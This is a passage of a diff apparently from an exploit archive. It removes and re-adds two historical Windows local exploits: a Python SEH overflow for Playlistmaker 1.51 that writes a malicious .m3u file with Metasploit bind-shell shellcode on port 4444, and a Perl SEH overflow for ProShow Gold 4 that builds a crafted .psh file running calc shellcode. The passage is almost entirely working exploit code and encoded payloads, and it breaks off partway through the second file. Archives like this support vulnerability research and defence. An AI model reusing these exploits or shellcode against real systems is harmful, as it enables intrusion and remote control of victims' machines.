-"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
-"\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x46\x51\x49"
-"\x4b\x43\x54\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x47\x30\x44\x4c"
-"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x45\x58\x51"
-"\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
-"\x49\x46\x42\x46\x50\x53\x42\x46\x45\x38\x50\x33\x50\x32\x42"
-"\x48\x42\x57\x43\x43\x46\x52\x51\x4f\x50\x54\x4b\x4f\x4e\x30"
-"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x4e"
-"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x44\x48"
-"\x45\x52\x51\x45\x42\x4a\x44\x42\x4b\x4f\x4e\x30\x45\x38\x48"
-"\x59\x45\x59\x4c\x35\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43"
-"\x50\x53\x46\x33\x46\x33\x51\x43\x50\x43\x51\x43\x51\x53\x46"
-"\x33\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x42\x46"
-"\x50\x53\x4b\x39\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x44"
-"\x30\x49\x57\x46\x37\x4b\x4f\x49\x46\x42\x4a\x44\x50\x46\x31"
-"\x46\x35\x4b\x4f\x48\x50\x45\x38\x4e\x44\x4e\x4d\x46\x4e\x4b"
-"\x59\x46\x37\x4b\x4f\x4e\x36\x50\x53\x51\x45\x4b\x4f\x4e\x30"
-"\x45\x38\x4d\x35\x47\x39\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
-"\x36\x50\x50\x51\x44\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
-"\x42\x48\x4b\x57\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x49"
-"\x46\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x42\x44\x45\x36"
-"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x42\x4a\x50\x50\x51"
-"\x49\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x50\x44\x4d\x59"
-"\x4d\x32\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46"
-"\x4d\x4b\x4e\x47\x32\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x47\x48"
-"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b\x4e\x48\x33\x45"
-"\x46\x4b\x4f\x43\x45\x50\x44\x4b\x4f\x4e\x36\x51\x4b\x50\x57"
-"\x50\x52\x50\x51\x50\x51\x46\x31\x42\x4a\x45\x51\x50\x51\x46"
-"\x31\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x49\x49"
-"\x45\x55\x48\x4e\x51\x43\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
-"\x4f\x50\x37\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43"
-"\x48\x44\x43\x54\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x43"
-"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x49\x46"
-"\x4b\x4f\x4e\x30\x41\x41")
-
-
-#[ Buffer ][ Short Jump ][ P/P/R ][ NOP Sled ][ Shellcode ]
-payload = "\x41" * 992 # buffer
-payload += "\xEB\x09\x90\x90" # short jump
-payload += "\x67\x15\xd3\x74" # overwrites SEH Handler => P/P/R (oledlg.dll) 0x74d31567
-payload += "\x90" * 20 # NOP Sled
-payload += shellcode # shellcode 
-
-print "[+] Creating exploit file"
-
-try:
- file = open("exploit.m3u","w")
- file.write(payload)
- file.close()
- print "[+] Exploit file created"
-except:
- print "[x] Error creating file!"
-
-# milw0rm.com [2009-08-18]
+# Playlistmaker version 1.51
+# Tested on Windows XP SP2 (English)
+# Exploit originally discovered by ThE g0bL!N/exploited by germaya_x
+
+# I could not get germaya_x's exploit to work with XP3.
+# The only useable p/p/r I could find was in oledlg.dll
+# which seems to be compiled with SafeSEH on in XP SP3.
+# However, oledlg.dll is useable in XP SP2.
+
+
+print "\n========================"
+print "Playlistmaker v1.5 (SEH)"
+print "Exploit written by Blake"
+print "Discovered by ThE g0bL!N"
+print "========================\n"
+
+# windows/shell_bind_tcp - 696 bytes
+# http://www.metasploit.com
+# Encoder: x86/alpha_mixed
+# EXITFUNC=seh, LPORT=4444, RHOST=
+ 
+shellcode = ( 
+"\x89\xe2\xdb\xce\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b"
+"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b"
+"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a"
+"\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31"
+"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x46"
+"\x51\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
+"\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
+"\x4b\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f"
+"\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
+"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
+"\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x46\x51\x49"
+"\x4b\x43\x54\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x47\x30\x44\x4c"
+"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x45\x58\x51"
+"\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
+"\x49\x46\x42\x46\x50\x53\x42\x46\x45\x38\x50\x33\x50\x32\x42"
+"\x48\x42\x57\x43\x43\x46\x52\x51\x4f\x50\x54\x4b\x4f\x4e\x30"
+"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x4e"
+"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x44\x48"
+"\x45\x52\x51\x45\x42\x4a\x44\x42\x4b\x4f\x4e\x30\x45\x38\x48"
+"\x59\x45\x59\x4c\x35\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43"
+"\x50\x53\x46\x33\x46\x33\x51\x43\x50\x43\x51\x43\x51\x53\x46"
+"\x33\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x42\x46"
+"\x50\x53\x4b\x39\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x44"
+"\x30\x49\x57\x46\x37\x4b\x4f\x49\x46\x42\x4a\x44\x50\x46\x31"
+"\x46\x35\x4b\x4f\x48\x50\x45\x38\x4e\x44\x4e\x4d\x46\x4e\x4b"
+"\x59\x46\x37\x4b\x4f\x4e\x36\x50\x53\x51\x45\x4b\x4f\x4e\x30"
+"\x45\x38\x4d\x35\x47\x39\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
+"\x36\x50\x50\x51\x44\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
+"\x42\x48\x4b\x57\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x49"
+"\x46\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x42\x44\x45\x36"
+"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x42\x4a\x50\x50\x51"
+"\x49\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x50\x44\x4d\x59"
+"\x4d\x32\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46"
+"\x4d\x4b\x4e\x47\x32\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x47\x48"
+"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b\x4e\x48\x33\x45"
+"\x46\x4b\x4f\x43\x45\x50\x44\x4b\x4f\x4e\x36\x51\x4b\x50\x57"
+"\x50\x52\x50\x51\x50\x51\x46\x31\x42\x4a\x45\x51\x50\x51\x46"
+"\x31\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x49\x49"
+"\x45\x55\x48\x4e\x51\x43\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
+"\x4f\x50\x37\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43"
+"\x48\x44\x43\x54\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x43"
+"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x49\x46"
+"\x4b\x4f\x4e\x30\x41\x41")
+
+
+#[ Buffer ][ Short Jump ][ P/P/R ][ NOP Sled ][ Shellcode ]
+payload = "\x41" * 992 # buffer
+payload += "\xEB\x09\x90\x90" # short jump
+payload += "\x67\x15\xd3\x74" # overwrites SEH Handler => P/P/R (oledlg.dll) 0x74d31567
+payload += "\x90" * 20 # NOP Sled
+payload += shellcode # shellcode 
+
+print "[+] Creating exploit file"
+
+try:
+ file = open("exploit.m3u","w")
+ file.write(payload)
+ file.close()
+ print "[+] Exploit file created"
+except:
+ print "[x] Error creating file!"
+
+# milw0rm.com [2009-08-18]
diff --git a/platforms/windows/local/9483.pl b/platforms/windows/local/9483.pl
index ca1d4d5c8..6dd04e3b9 100755
--- a/platforms/windows/local/9483.pl
+++ b/platforms/windows/local/9483.pl
@@ -1,254 +1,254 @@
-#
-# [+] Vulnerability     : ProShow Gold 4 BOF
-# [+] Detected by       : Bkis - http://blog.bkis.com/?p=737
-# [*] Sploit coded by   : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com)
-# [*] Sploit coded on   : August 20, 2009
-# [*] Type              : local
-# [*] OS                : Windows
-# [*] Product           : Photodex ProShow Gold
-# [*] Versions affected : 4.0
-# [*] Download link     : http://www.photodex.com/downloads/go_proshowgold
-# [*] -------------------------------------------------------------------------
-# [*] Method            : SEH - Universal
-# [*] Tested on         : Windows XP SP3 En
-# [*] Greetz&Tx to      : Saumil/SK
-# [*] -------------------------------------------------------------------------
-#                                               MMMMM~.                          
-#                                               MMMMM?.                          
-#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
-#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
-#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
-#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
-#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
-#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
-#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
-#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
-#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
-#                                                                   eip hunters
-# -----------------------------------------------------------------------------
-# Script provided 'as is', without any warranty. 
-# Use for educational purposes only.
-#
-print " [+] Preparing payload\n";
-my $sploitfile="proshowsploit.psh";
-my $fileheader="Photodex(R) ProShow(TM) Show File Version=0\n".
-"proshowVersion=2549\n".
-"title=Untitled ProShow 1\n".
-"fileName=proshowsploit.psh\n".
-"description=''\n".
-"showAspect=1\n".
-"showSizeX=16\n".
-"showSizeY=9\n".
-"loop=1\n".
-"loopRestart=1\n".
-"displaySizeX=704\n".
-"displaySizeY=528\n".
-"videoSizeX=720\n".
-"videoSizeY=480\n".
-"videoFrameRate=29970\n".
-"videoBitRate=1120000\n".
-"videoMuxBitRate=1394400\n".
-"outputImageSizeX=1024\n".
-"outputImageSizeY=768\n".
-"outputQuality=80\n".
-"toolbarEnable=1\n".
-"allowQuit=1\n".
-"allowPlay=1\n".
-"allowTime=1\n".
-"allowRestart=1\n".
-"allowSave=1\n".
-"allowSaveAll=1\n".
-"allowPrint=1\n".
-"allowPrintAll=1\n".
-"allowCopy=1\n".
-"allowSaver=1\n".
-"allowCta=1\n".
-"ctaLabel=ProShow Info\n".
-"ctaURL=http://www.photodex.com/\n".
-"background=1\n".
-"bgOutlineColor=0\n".
-"bgSizeMode=1\n".
-"bgColorizeColor=8421504\n".
-"waterOpacity=128\n".
-"waterZoom=10000\n".
-"waterColorizeColor=8421504\n".
-"musicVolumeOffset=100\n".
-"defaultCellVolumeOffset=100\n".
-"defaultCellFadeIn=100\n".
-"defaultCellFadeOut=100\n".
-"defaultMusicVolumeOffset=50\n".
-"defaultMusicFadeIn=100\n".
-"defaultMusicFadeOut=100\n".
-"maxDispWidth=800\n".
-"maxDispHeight=600\n".
-"maxRender=1\n".
-"maxRenderWidth=800\n".
-"maxRenderHeight=600\n".
-"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
-"makeFileLocalFolder=c:/\n".
-"cells=2\n".
-"cell[0].imageEnable=1\n".
-"cell[0].nrOfImages=1\n".
-"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
-my $junk = "A" x 6120;
-my $nseh = "\xeb\x18\x90\x90";
-my $seh = pack('V',0x01a614ea);
-my $nop="\x90" x 30;
-# windows/exec - 144 bytes
-# http://www.metasploit.com
-# Encoder: x86/shikata_ga_nai
-# EXITFUNC=seh, CMD=calc
-my $shellcode="\xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf" .
-"\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93" .
-"\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80" .
-"\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2" .
-"\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40" .
-"\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f" .
-"\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56" .
-"\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c" .
-"\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c" .
-"\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a" .
-"\x7b\xc3\x04\x6d";
-
-my $junk2="D" x (2000-length($shellcode));
-my $filefooter = "\ncell[0].images[0].imageEnable=1\n".
-"cell[0].images[0].name=Abstract_02\n".
-"cell[0].images[0].replaceableTemplate=1\n".
-"cell[0].images[0].sizeMode=1\n".
-"cell[0].images[0].colorizeColor=8421504\n".
-"cell[0].images[0].colorizeStrength=10000\n".
-"cell[0].images[0].outlineColor=16777215\n".
-"cell[0].images[0].aspectX=4\n".
-"cell[0].images[0].aspectY=3\n".
-"cell[0].images[0].videoVolume=100\n".
-"cell[0].images[0].objectId=1\n".
-"cell[0].images[0].videoSpeed=100\n".
-"cell[0].images[0].nrOfKeyframes=2\n".
-"cell[0].images[0].keyframes[0].timeSegment=1\n".
-"cell[0].images[0].keyframes[0].attributeMask=-1\n".
-"cell[0].images[0].keyframes[0].zoomX=10000\n".
-"cell[0].images[0].keyframes[0].zoomY=10000\n".
-"cell[0].images[0].keyframes[0].panAccelType=1\n".
-"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
-"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
-"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
-"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
-"cell[0].images[0].keyframes[0].lockAR=1\n".
-"cell[0].images[0].keyframes[0].transparency=0\n".
-"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
-"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
-"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
-"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
-"cell[0].images[0].keyframes[1].timestamp=10000\n".
-"cell[0].images[0].keyframes[1].timeSegment=3\n".
-"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
-"cell[0].images[0].keyframes[1].attributeMask=-1\n".
-"cell[0].images[0].keyframes[1].zoomX=10000\n".
-"cell[0].images[0].keyframes[1].zoomY=10000\n".
-"cell[0].images[0].keyframes[1].panAccelType=1\n".
-"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
-"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
-"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
-"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
-"cell[0].images[0].keyframes[1].lockAR=1\n".
-"cell[0].images[0].keyframes[1].transparency=0\n".
-"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
-"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
-"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
-"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
-"cell[0].background=1\n".
-"cell[0].bgDefault=1\n".
-"cell[0].bgSizeMode=1\n".
-"cell[0].bgColorizeColor=8421504\n".
-"cell[0].sound.useDefault=1\n".
-"cell[0].sound.volume=100\n".
-"cell[0].sound.fadeIn=100\n".
-"cell[0].sound.fadeOut=100\n".
-"cell[0].sound.async=1\n".
-"cell[0].sound.musicUseDefault=1\n".
-"cell[0].sound.musicVolume=50\n".
-"cell[0].sound.musicFadeIn=100\n".
-"cell[0].sound.musicFadeOut=100\n".
-"cell[0].musicVolumeOffset=50\n".
-"cell[0].time=3000\n".
-"cell[0].transId=2\n".
-"cell[0].transTime=3000\n".
-"cell[0].includeGlobalCaptions=1\n".
-"cell[1].imageEnable=1\n".
-"cell[1].nrOfImages=1\n".
-"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
-"cell[1].images[0].imageEnable=1\n".
-"cell[1].images[0].name=Abstract_01\n".
-"cell[1].images[0].replaceableTemplate=1\n".
-"cell[1].images[0].sizeMode=1\n".
-"cell[1].images[0].colorizeColor=8421504\n".
-"cell[1].images[0].colorizeStrength=10000\n".
-"cell[1].images[0].outlineColor=16777215\n".
-"cell[1].images[0].aspectX=4\n".
-"cell[1].images[0].aspectY=3\n".
-"cell[1].images[0].videoVolume=100\n".
-"cell[1].images[0].objectId=2\n".
-"cell[1].images[0].videoSpeed=100\n".
-"cell[1].images[0].nrOfKeyframes=2\n".
-"cell[1].images[0].keyframes[0].timeSegment=1\n".
-"cell[1].images[0].keyframes[0].attributeMask=-1\n".
-"cell[1].images[0].keyframes[0].zoomX=10000\n".
-"cell[1].images[0].keyframes[0].zoomY=10000\n".
-"cell[1].images[0].keyframes[0].panAccelType=1\n".
-"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
-"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
-"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
-"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
-"cell[1].images[0].keyframes[0].lockAR=1\n".
-"cell[1].images[0].keyframes[0].transparency=0\n".
-"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
-"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
-"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
-"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
-"cell[1].images[0].keyframes[1].timestamp=10000\n".
-"cell[1].images[0].keyframes[1].timeSegment=3\n".
-"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
-"cell[1].images[0].keyframes[1].attributeMask=-1\n".
-"cell[1].images[0].keyframes[1].zoomX=10000\n".
-"cell[1].images[0].keyframes[1].zoomY=10000\n".
-"cell[1].images[0].keyframes[1].panAccelType=1\n".
-"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
-"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
-"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
-"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
-"cell[1].images[0].keyframes[1].lockAR=1\n".
-"cell[1].images[0].keyframes[1].transparency=0\n".
-"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
-"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
-"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
-"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
-"cell[1].background=1\n".
-"cell[1].bgDefault=1\n".
-"cell[1].bgSizeMode=1\n".
-"cell[1].bgColorizeColor=8421504\n".
-"cell[1].sound.useDefault=1\n".
-"cell[1].sound.volume=100\n".
-"cell[1].sound.fadeIn=100\n".
-"cell[1].sound.fadeOut=100\n".
-"cell[1].sound.async=1\n".
-"cell[1].sound.musicUseDefault=1\n".
-"cell[1].sound.musicVolume=50\n".
-"cell[1].sound.musicFadeIn=100\n".
-"cell[1].sound.musicFadeOut=100\n".
-"cell[1].musicVolumeOffset=50\n".
-"cell[1].time=3000\n".
-"cell[1].transId=2\n".
-"cell[1].transTime=3000\n".
-"cell[1].includeGlobalCaptions=1\n".
-"modifierCount=0\n";
-
-my $payload = $fileheader.$junk.$nseh.$seh.$nop.$shellcode.$junk2.$filefooter;
-
-print " [+] Writing payload to file\n";
-open($FILE,">$sploitfile");
-print $FILE $payload;
-close($FILE);
-print " [+] Exploit file " . $sploitfile . " created\n";
-print " [+] Wrote " . length($payload) . " bytes\n";
-
-# milw0rm.com [2009-08-24]
+#
+# [+] Vulnerability     : ProShow Gold 4 BOF
+# [+] Detected by       : Bkis - http://blog.bkis.com/?p=737
+# [*] Sploit coded by   : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com)
+# [*] Sploit coded on   : August 20, 2009
+# [*] Type              : local
+# [*] OS                : Windows
+# [*] Product           : Photodex ProShow Gold
+# [*] Versions affected : 4.0
+# [*] Download link     : http://www.photodex.com/downloads/go_proshowgold
+# [*] -------------------------------------------------------------------------
+# [*] Method            : SEH - Universal
+# [*] Tested on         : Windows XP SP3 En
+# [*] Greetz&Tx to      : Saumil/SK
+# [*] -------------------------------------------------------------------------
+#                                               MMMMM~.                          
+#                                               MMMMM?.                          
+#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
+#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
+#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
+#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
+#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
+#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
+#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
+#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
+#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
+#                                                                   eip hunters
+# -----------------------------------------------------------------------------
+# Script provided 'as is', without any warranty. 
+# Use for educational purposes only.
+#
+print " [+] Preparing payload\n";
+my $sploitfile="proshowsploit.psh";
+my $fileheader="Photodex(R) ProShow(TM) Show File Version=0\n".
+"proshowVersion=2549\n".
+"title=Untitled ProShow 1\n".
+"fileName=proshowsploit.psh\n".
+"description=''\n".
+"showAspect=1\n".
+"showSizeX=16\n".
+"showSizeY=9\n".
+"loop=1\n".
+"loopRestart=1\n".
+"displaySizeX=704\n".
+"displaySizeY=528\n".
+"videoSizeX=720\n".
+"videoSizeY=480\n".
+"videoFrameRate=29970\n".
+"videoBitRate=1120000\n".
+"videoMuxBitRate=1394400\n".
+"outputImageSizeX=1024\n".
+"outputImageSizeY=768\n".
+"outputQuality=80\n".
+"toolbarEnable=1\n".
+"allowQuit=1\n".
+"allowPlay=1\n".
+"allowTime=1\n".
+"allowRestart=1\n".
+"allowSave=1\n".
+"allowSaveAll=1\n".
+"allowPrint=1\n".
+"allowPrintAll=1\n".
+"allowCopy=1\n".
+"allowSaver=1\n".
+"allowCta=1\n".
+"ctaLabel=ProShow Info\n".
+"ctaURL=http://www.photodex.com/\n".
+"background=1\n".
+"bgOutlineColor=0\n".
+"bgSizeMode=1\n".
+"bgColorizeColor=8421504\n".
+"waterOpacity=128\n".
+"waterZoom=10000\n".
+"waterColorizeColor=8421504\n".
+"musicVolumeOffset=100\n".
+"defaultCellVolumeOffset=100\n".
+"defaultCellFadeIn=100\n".
+"defaultCellFadeOut=100\n".
+"defaultMusicVolumeOffset=50\n".
+"defaultMusicFadeIn=100\n".
+"defaultMusicFadeOut=100\n".
+"maxDispWidth=800\n".
+"maxDispHeight=600\n".
+"maxRender=1\n".
+"maxRenderWidth=800\n".
+"maxRenderHeight=600\n".
+"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
+"makeFileLocalFolder=c:/\n".
+"cells=2\n".
+"cell[0].imageEnable=1\n".
+"cell[0].nrOfImages=1\n".
+"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
+my $junk = "A" x 6120;
+my $nseh = "\xeb\x18\x90\x90";
+my $seh = pack('V',0x01a614ea);
+my $nop="\x90" x 30;
+# windows/exec - 144 bytes
+# http://www.metasploit.com
+# Encoder: x86/shikata_ga_nai
+# EXITFUNC=seh, CMD=calc
+my $shellcode="\xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf" .
+"\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93" .
+"\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80" .
+"\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2" .
+"\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40" .
+"\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f" .
+"\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56" .
+"\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c" .
+"\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c" .
+"\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a" .
+"\x7b\xc3\x04\x6d";
+
+my $junk2="D" x (2000-length($shellcode));
+my $filefooter = "\ncell[0].images[0].imageEnable=1\n".
+"cell[0].images[0].name=Abstract_02\n".
+"cell[0].images[0].replaceableTemplate=1\n".
+"cell[0].images[0].sizeMode=1\n".
+"cell[0].images[0].colorizeColor=8421504\n".
+"cell[0].images[0].colorizeStrength=10000\n".
+"cell[0].images[0].outlineColor=16777215\n".
+"cell[0].images[0].aspectX=4\n".
+"cell[0].images[0].aspectY=3\n".
+"cell[0].images[0].videoVolume=100\n".
